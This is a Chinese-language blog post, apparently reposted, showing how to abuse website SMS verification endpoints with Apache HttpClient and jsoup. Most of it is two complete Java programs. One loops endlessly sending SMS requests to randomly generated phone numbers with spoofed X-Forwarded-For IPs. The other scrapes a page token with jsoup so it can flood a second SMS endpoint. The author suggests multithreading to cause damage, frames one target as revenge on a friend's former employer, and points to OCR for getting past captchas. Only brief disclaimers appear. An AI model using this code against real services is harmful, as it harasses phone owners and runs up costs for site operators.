apache + httpclient4 + jsoup 进行模拟浏览器url访问
生活随笔
收集整理的這篇文章主要介紹了
apache + httpclient4 + jsoup 进行模拟浏览器url访问
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
Hi,各位好,好久不玩博客了,最近在新公司無聊的時候,在查看一個其他網站的注冊源代碼時
發現了一處bug
首先前臺頁面是這樣的結構(不顯示相關網站的敏感信息)
這是一個很普通的注冊頁面,ok,我們看看相關js源代碼,找到免費獲取驗證碼的功能
這段代碼就是普通的校驗手機號,然后發送給短信接口api,60秒的校驗重復發送,不知道大家發現問題了嗎?
我可以根據url惡意仿造這接口需要的參數進行發送手機號碼爆破,【(⊙?⊙)# 我都經歷了什么。。呃。。】
目標服務器是http請求,那么我們先偽造一個試試【如果js被混淆可以使用Firefox查看post的數據請求及響應(。?_?)/~~~】
下圖是直接在瀏覽器地址欄來進行http訪問的
返回的是json數據?? 中文是Unicode碼【Unicode碼可以在網站上轉換】,該Unicode碼是“成功”的意思,同時手機上接收到了短信。
嗯,短信發送過來了,我們是不是該干點什么py交易了呢【(?????),罪惡】
我們可以使用ajax 跨域來訪問也可以使用java? apache httpclient來進行模擬瀏覽器訪問
一言不合貼maven【apache httpclient(這里使用的是4.5+版本)和 jsoup(解析html很好用)】
<dependency><groupId>org.apache.httpcomponents</groupId><artifactId>httpclient</artifactId><version>4.5.2</version> </dependency><dependency><groupId>org.jsoup</groupId><artifactId>jsoup</artifactId><version>1.9.1</version> </dependency>上代碼:http方式模擬訪問url import java.io.IOException; import java.io.UnsupportedEncodingException; import java.util.ArrayList; import java.util.List; import java.util.concurrent.ThreadLocalRandom; import org.apache.http.HttpEntity; import org.apache.http.NameValuePair; import org.apache.http.client.ClientProtocolException; import org.apache.http.client.entity.UrlEncodedFormEntity; import org.apache.http.client.methods.CloseableHttpResponse; import org.apache.http.client.methods.HttpPost; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.client.HttpClients; import org.apache.http.message.BasicNameValuePair; import org.apache.http.util.EntityUtils;public class Test {/*** url*/private static String URL = "http://www.aaabbb.ccc/admin/sendmsg";/*** 定義手機號碼段*/private static String[] telFirst = "134,135,136,137,138,139,150,151,152,157,158,159,130,131,132,155,156,133,153,173,180".split(",");/*** 獲取隨機范圍內的數字*/public static int getNum(int start, int end) {ThreadLocalRandom random = ThreadLocalRandom.current();return random.nextInt( (end - start + 1) + start);}/*** 獲取偽造的手機號*/private static String getTel() {int index = getNum(0, telFirst.length - 1);String first = telFirst[index];String second = String.valueOf(getNum(1, 888) + 10000).substring(1);String thrid = String.valueOf(getNum(1, 9100) + 10000).substring(1);return first + second + thrid;}/*** 獲取偽造的ip*/public static String getIPProxy(){StringBuffer sb = new StringBuffer();sb.append(getNum(2,254));sb.append(".");sb.append(getNum(2,254));sb.append(".");sb.append(getNum(2,254));sb.append(".");sb.append(getNum(2,254));return sb.toString();}/*** 程序入口*/public static void main(String[] args) throws Exception {while(true){//單線程的死循環 post(URL,getTel(),getIPProxy());}}/*** 發送 post請求訪問本地應用并根據傳遞參數不同返回不同結果*/public static void post(String url, String number,String ip_proxy) {// 創建默認的httpClient實例.CloseableHttpClient httpclient = HttpClients.createDefault();// 創建httppostHttpPost httppost = new HttpPost(url);httppost.setHeader("Connection","keep-alive");httppost.setHeader("Referer","從哪個網站連入過來的");httppost.setHeader("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0");httppost.setHeader("x-forwarded-for",ip_proxy);//偽造的ip地址// 創建參數隊列List<NameValuePair> formparams = new ArrayList<NameValuePair>();formparams.add(new BasicNameValuePair("phone", number));UrlEncodedFormEntity uefEntity;try {uefEntity = new UrlEncodedFormEntity(formparams, "UTF-8");httppost.setEntity(uefEntity);System.out.println("executing request " + httppost.getURI());CloseableHttpResponse response = httpclient.execute(httppost);try {HttpEntity entity = response.getEntity();if (entity != null) {System.out.println("--------------------------------------");System.out.println("Response content: " + EntityUtils.toString(entity, "UTF-8"));System.out.println("--------------------------------------");}} finally {response.close();}} catch (ClientProtocolException e) {e.printStackTrace();} catch (UnsupportedEncodingException e1) {e1.printStackTrace();} catch (IOException e) {e.printStackTrace();} finally {// 關閉連接,釋放資源try {httpclient.close();} catch (IOException e) {e.printStackTrace();}}}}
執行獲得結果:
--------------------------------------
Response content: {"code":"2000","message":"\u6210\u529f"}
--------------------------------------
循環略..
例子為單線程死循環,如過想搞壞對方的話可以使用多線程,在此不列舉多線程的相關知識了,您可以查找相關資料來了解。
PS:不過希望各位觀眾老爺知道這樣做是不對的,以前有過短信接口了解,根據花錢的多少來決定每條短信多少錢,最便宜應該是比分還少的單位,別禍害了網站。
我們從這個例子上發現問題,一個短信接口要做足權限及驗證碼的驗證的【要不錢都被壞人盜刷了_(:зゝ∠)_】
發現了對方的問題,盡量通知到對方的網站管理員或者客服反饋bug。
下面我們在看一個例子:【…(⊙_⊙;)…嘎。還要看嗎?】
事件前提:我一個朋友,在一家互聯網公司做程序員,辛苦了一年【4個人完成了整個項目,項目賣了2000w+】,到了過年的前幾天,無原因突然被辭退,
辛苦了一年,到頭來什么也沒得到,誒,有這樣的領導真是人生寂寞如雪啊。。扯遠了,反正就是被強制辭退打包回家活都不用交接直接算賬走人。
然后看了看他們的網站注冊。。。【咦?為什么還要看網站注冊。。= ̄ω ̄=】
注冊頁面如圖:
ok,在看下源代碼:
咦,感覺好高端,加上了token。。。
然后在仔細查看這個token的賦值
服務端直接寫入js變量里了。。。。
怎么辦?感覺好難處理。別急,有jsoup!
jsoup的相關介紹和資料就不在這里寫了,請大家自己動手去了解下,我的大概理解就是解析html document對象的,讓你方便的獲取你想要的信息等(不支持動態的js執行)
我們只要先鏈接一下該頁面并獲取到token并把該值傳遞到發送短信接口的參數里即可實現爆破。
上代碼:
import java.io.IOException; import java.util.concurrent.ThreadLocalRandom; import org.apache.http.HttpResponse; import org.apache.http.client.methods.HttpGet; import org.apache.http.client.methods.HttpPost; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.client.HttpClients; import org.apache.http.util.EntityUtils; import org.jsoup.Jsoup; import org.jsoup.nodes.Document; import org.jsoup.select.Elements; /*** 爆破對方短信發送接口*/ public class Test2 {/*** 獲取token地址 查了對方的網頁源代碼發現js處有token進行服務器編譯*/static String GET_TOKEN_URL = "http://www.aaabbb.ccc/register.htm";/*** 爆破地址 --短信接口模擬發送*/static String BOOM_URL = "http://www.aaabbb.ccc/sms_send.htm";/*** 手機號段 173 180號段沒見過 隨便加的*/static String[] telFirst = "134,135,136,137,138,139,150,151,152,157,158,159,130,131,132,155,156,133,153,173,180".split(",");/*** 獲取最大值范圍內的隨機數*/public static int getNum(int start, int end) {ThreadLocalRandom tlr = ThreadLocalRandom.current();int m = tlr.nextInt(end - start + 1) + start;return m;}/*** 偽造電話號*/public static String getTel() {int index = getNum(0, telFirst.length - 1);String first = telFirst[index];String second = String.valueOf(getNum(1, 888) + 10000).substring(1);String thrid = String.valueOf(getNum(1, 9100) + 10000).substring(1);return first + second + thrid;}/*** 偽造ip*/public static String getIPProxy(){StringBuffer sb = new StringBuffer();sb.append(getNum(2,254));sb.append(".");sb.append(getNum(2,254));sb.append(".");sb.append(getNum(2,254));sb.append(".");sb.append(getNum(2,254));return sb.toString();}/*** 程序入口*/public static void main(String[] args) throws Exception{//實際不在使用單一單線程,使用多線程搞破壞了while(true){kissMyAss(getTel(),getIPProxy());}}/*** 獲取token*/private static String getToken(String html){//解析返回的htmlDocument doc = Jsoup.parse(html);//獲取到帶有script的元素組Elements eles = doc.select("script");if (eles != null && eles.size() > 0) {//根據頁面分析得出token所在位置為第7個并且獲取到tokenString token = eles.get(6).data().split(";")[1];token = token.replaceAll("var sms_token=", "").replaceAll("\"", "").replaceAll("\n", "").replaceAll(" ","").replaceAll("\t","").replaceAll("\r","");return token;}return null;}/*** 你懂得*/public static void kissMyAss(String number,String ip_proxy) throws Exception {// // 創建HttpClientBuilderCloseableHttpClient client = HttpClients.createDefault();HttpPost httpPost = new HttpPost(GET_TOKEN_URL);try {// 執行post請求HttpResponse httpResponse = client.execute(httpPost);String html = EntityUtils.toString(httpResponse.getEntity());String token = getToken(html); // System.out.println(token);// 執行get請求//拼湊需要的參數HttpGet httpGet = new HttpGet(BOOM_URL + "?mobile=" + number + "&mobile_type=new&sms_token="+token);httpGet.setHeader("Connection","keep-alive");httpGet.setHeader("Referer","從哪個網站過來的");httpGet.setHeader("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0");httpGet.setHeader("x-forwarded-for",ip_proxy);httpResponse = client.execute(httpGet);String bodyHtml = EntityUtils.toString(httpResponse.getEntity());System.out.println(bodyHtml);} catch (IOException e) {e.printStackTrace();} finally {try {// 關閉流并釋放資源client.close();} catch (IOException e) {e.printStackTrace();}}}}返回結果:略。
恭喜你,你現在就可以做一個網站爬取的功能了。
從這個問題我們也可以看出,光用token(此例子token純屬擺設)也是不行的,得有一套自己的加密規則和授權才可以
ok,那么看看現在的一些網站的注冊頁面里的短信發送接口吧。
我們來看一個網站,這個網站的所屬公司是上市公司且在美國納斯達克敲鐘的。具體就不多說了
還是看頁面
F12大法好
因為url被我除去了,他其實是https的訪問
https相關的知識也請各位自行搜索
httpclient如何用https來訪問呢?
上代碼:【其中借鑒了網上一些博客的代碼段】
執行返回結果:略。
其實他有個參數是驗證碼的參數,只是沒有強制帶入
同時也看了看各大網站的注冊發送短信接口的發送參數,
淘寶的注冊可是帶都是特定加密信息規則的【(¬_¬)。。你還想干嘛?】
去哪網是帶驗證碼【如果想破解可以了解下ocr圖像文字識別技術,安利個開源的一個ocr接口?https://github.com/AvensLab/OcrKing 】
ok,先說這么多吧,再說多就會被請去喝茶聊天了。_(:зゝ∠)_
希望各位也不要亂搞啊。發現bug要發給網站維護人員啊!!!!
還有就是偽造ip那個只是一部分YY而已。他們也是有各種手段來獲取到你的真實ip的。
把自己的接口寫的茁壯才是正經事誒誒誒!
謝謝各位觀眾老爺,下次寫博客就不知道是什么時候了。o(≧口≦)o
------
55555~~~圖片截圖得不行,畢竟csdn沒網易郵箱那么智能~截個圖就能顯示不用存網絡了。又重新弄了一次圖片下載本地上傳。
PS:本想看看csdn短信接口來著,不過他的短信接口已經500了_(:зゝ∠)_
總結
以上是生活随笔為你收集整理的apache + httpclient4 + jsoup 进行模拟浏览器url访问的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: POI 实现Excel导入数据库
- 下一篇: macOS 10.14 开机黑屏 (硬盘